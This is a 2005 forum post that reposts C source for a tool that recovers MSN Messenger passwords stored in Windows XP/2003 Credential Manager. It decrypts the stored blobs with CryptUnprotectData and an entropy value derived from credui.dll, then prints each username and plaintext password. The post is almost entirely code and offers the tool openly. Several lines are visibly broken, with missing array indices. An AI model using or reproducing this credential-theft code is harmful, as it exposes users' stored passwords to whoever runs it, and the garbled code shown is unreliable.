Author Topic: MSN Password Decrypter  (Read 2871 times)

0 Members and 1 Guest are viewing this topic.

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
MSN Password Decrypter
« on: August 18, 2005, 09:31:05 am »
Sounds interesting.  Untested, so use at your own risk:

----------------------------------------

MSN Messenger uses Windows Credential UI [credui.dll]
on WinXP/2003. Password-Storage mechanism differs in
these OSes so, the code posted by tombkeeper
[http://xfocus.net/articles/200408/726.html] doesn't
seem to work anymore on my OS atleast. Also, a
'entropy' value has been thrown, which is based on
credui.dll GUID.

So, here is the code that fullfils the same purpose -
but surely works on my OS [WinXP SP2]  :)

/--- Start-Code --/

/*
 *  MSN Messenger Password Decrypter for Windows XP &
2003
 *  (Compiled-VC++ 7.0, tested on WinXP SP2, MSN
Messenger 7.0)
 *      - Gregory R. Panakkal
 *        http://www.crapware.tk/
 *        http://www.infogreg.com/
 */

#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>

#pragma comment(lib, "Crypt32.lib")


//Following definitions taken from wincred.h
//[available only in Oct 2002 MS Platform SDK /
LCC-Win32 Includes]

typedef struct _CREDENTIAL_ATTRIBUTEA {
    LPSTR Keyword;
    DWORD Flags;
    DWORD ValueSize;
    LPBYTE Value;
}
CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;

typedef struct _CREDENTIALA {
    DWORD Flags;
    DWORD Type;
    LPSTR TargetName;
    LPSTR Comment;
    FILETIME LastWritten;
    DWORD CredentialBlobSize;
    LPBYTE CredentialBlob;
    DWORD Persist;
    DWORD AttributeCount;
    PCREDENTIAL_ATTRIBUTEA Attributes;
    LPSTR TargetAlias;
    LPSTR UserName;
} CREDENTIALA,*PCREDENTIALA;

typedef CREDENTIALA CREDENTIAL;
typedef PCREDENTIALA PCREDENTIAL;

////////////////////////////////////////////////////////////////////

typedef BOOL (WINAPI *typeCredEnumerateA)(LPCTSTR,
DWORD, DWORD *, PCREDENTIALA **);
typedef BOOL (WINAPI *typeCredReadA)(LPCTSTR, DWORD,
DWORD, PCREDENTIALA *);
typedef VOID (WINAPI *typeCredFree)(PVOID);

typeCredEnumerateA pfCredEnumerateA;
typeCredReadA pfCredReadA;
typeCredFree pfCredFree;

////////////////////////////////////////////////////////////////////

void showBanner()
{
    printf("MSN Messenger Password Decrypter for
Windows XP/2003\n");
    printf("   - Gregory R. Panakkal,
http://www.infogreg.com \n\n");
}

////////////////////////////////////////////////////////////////////
int main()
{
    PCREDENTIAL *CredentialCollection = NULL;
    DATA_BLOB blobCrypt, blobPlainText, blobEntropy;

    //used for filling up blobEntropy
    char szEntropyStringSeed[37] =
"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; //credui.dll
    short int EntropyData[37];
    short int tmp;

    HMODULE hDLL;
    DWORD Count, i;

    showBanner();

    //Locate CredEnumerate, CredRead, CredFree from
advapi32.dll
    if( hDLL = LoadLibrary("advapi32.dll") )
    {
        pfCredEnumerateA =
(typeCredEnumerateA)GetProcAddress(hDLL,
"CredEnumerateA");
        pfCredReadA =
(typeCredReadA)GetProcAddress(hDLL, "CredReadA");
        pfCredFree =
(typeCredFree)GetProcAddress(hDLL, "CredFree");

        if( pfCredEnumerateA == NULL||
            pfCredReadA == NULL ||
            pfCredFree == NULL )
        {
            printf("error!\n");
            return -1;
        }
    }
   

    //Get an array of 'credential', satisfying the
filter
    pfCredEnumerateA("Passport.Net\\*", 0, &Count,
&CredentialCollection);


    if( Count ) //usually this value is only 1
    {

        //Calculate Entropy Data
        for(i=0; i<37; i++) //
strlen(szEntropyStringSeed) = 37
        {
            tmp = (short int)szEntropyStringSeed;
            tmp <<= 2;
            EntropyData = tmp;
        }

        for(i=0; i<Count; i++)
        {
            blobEntropy.pbData = (BYTE *)&EntropyData;
            blobEntropy.cbData = 74;
//sizeof(EntropyData)

            blobCrypt.pbData =
CredentialCollection->CredentialBlob;
            blobCrypt.cbData =
CredentialCollection->CredentialBlobSize;

            CryptUnprotectData(&blobCrypt, NULL,
&blobEntropy, NULL, NULL, 1, &blobPlainText);
           
            printf("Username : %s\n",
CredentialCollection->UserName);
            printf("Password : %ls\n\n",
blobPlainText.pbData);
        }
    }

    pfCredFree(CredentialCollection);
}

/--- End-Code --/

URL :
http://www.infogreg.com/source-code/gpl/msn-messenger-password-decrypter-for-windows-xp-and-2003.html

rgds,
Gregory R. Panakkal
      
____________________________________________________
Send a rakhi to your brother, buy gifts and win attractive prizes. Log on to http://in.promos.yahoo.com/rakhi/index.html